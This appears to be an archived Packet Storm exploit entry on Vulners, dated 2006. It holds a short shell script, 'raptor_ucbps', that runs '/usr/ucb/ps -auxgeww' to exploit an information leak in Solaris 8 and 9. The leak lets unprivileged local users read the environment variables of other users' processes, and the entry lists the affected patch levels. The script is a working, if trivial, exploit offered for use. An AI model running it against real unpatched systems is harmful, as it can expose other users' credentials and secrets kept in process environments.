Lucene search
K

psraptor.txt

🗓️ 27 Aug 2006 00:00:00Reported by Marco IvaldiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 35 Views

raptor_ucbps - information leak with Solaris /usr/ucb/ps. Vulnerable platforms listed

Code
`#!/bin/sh  
  
#  
# $Id: raptor_ucbps,v 1.1 2006/07/26 12:15:42 raptor Exp $  
#  
# raptor_ucbps - information leak with Solaris /usr/ucb/ps  
# Copyright (c) 2006 Marco Ivaldi <[email protected]>  
#  
# A security vulnerability in the "/usr/ucb/ps" (see ps(1B)) command may allow   
# unprivileged local users the ability to see environment variables and their   
# values for processes which belong to other users (Sun Alert ID: 102215).  
#  
# Absolutely nothing fancy, but it may turn out to be useful;)  
#  
# Usage:  
# $ chmod +x raptor_ucbps  
# $ ./raptor_ucbps  
# [...]  
#  
# Vulnerable platforms (SPARC):  
# Solaris 8 without patch 109023-05 [tested]  
# Solaris 9 without patch 120240-01 [tested]  
#  
# Vulnerable platforms (x86):  
# Solaris 8 without patch 109024-05 [untested]  
# Solaris 9 without patch 120239-01 [untested]  
#  
  
echo "raptor_ucbps - information leak with Solaris /usr/ucb/ps"  
echo "Copyright (c) 2006 Marco Ivaldi <[email protected]>"  
echo  
  
/usr/ucb/ps -auxgeww  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation